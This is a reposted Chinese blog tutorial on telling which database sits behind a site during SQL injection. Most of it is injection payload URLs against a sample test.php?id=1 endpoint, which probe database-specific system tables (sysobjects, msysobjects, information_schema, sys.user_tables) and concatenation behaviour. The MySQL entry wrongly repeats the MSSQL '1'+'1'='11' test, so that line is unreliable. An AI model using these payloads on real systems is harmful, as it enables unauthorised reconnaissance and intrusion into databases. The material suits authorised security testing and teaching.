码迷,mamicode.com
首页 > 数据库 > 详细

sql注入过程中后台数据库类型的三种判断方式

时间:2017-07-11 16:36:44      阅读:386      评论:0      收藏:0      [点我收藏+]

标签:sql注入   安全测试   数据库类型判断   

后台数据库类型判断:

一、通过页面返回的报错信息,一般情况下页面报错会显示是什么数据库类型,在此不多说;

二、通过各个数据库特有的数据表来判断:

    1、mssql数据库

      http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1

    2、access数据库

      http://127.0.0.1/test.php?id=1 and (select count(*) from msysobjects)>0 and 1=1

    3、mysql数据库(mysql版本在5.0以上)

      http://127.0.0.1/test.php?id=1 and (select count(*) from information_schema.TABLES)>0 and 1=1

    4、oracle数据库

      http://127.0.0.1/test.php?id=1 and (select count(*) from sys.user_tables)>0 and 1=1

三、通过各数据库特有的连接符判断数据库类型:

    1、mssql数据库

     http://127.0.0.1/test.php?id=1 and ‘1‘ + ‘1‘ = ‘11‘

    2、mysql数据库

     http://127.0.0.1/test.php?id=1 and ‘1‘ + ‘1‘ = ‘11‘

     http://127.0.0.1/test.php?id=1 and CONCAT(‘1‘,‘1‘)=‘11‘

    3、oracle数据库

     http://127.0.0.1/test.php?id=1 and ‘1‘||‘1‘=‘11‘

     http://127.0.0.1/test.php?id=1 and CONCAT(‘1‘,‘1‘)=‘11‘

sql注入过程中后台数据库类型的三种判断方式

标签:sql注入   安全测试   数据库类型判断   

原文地址:http://baiwuya2009.blog.51cto.com/4211642/1946358

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!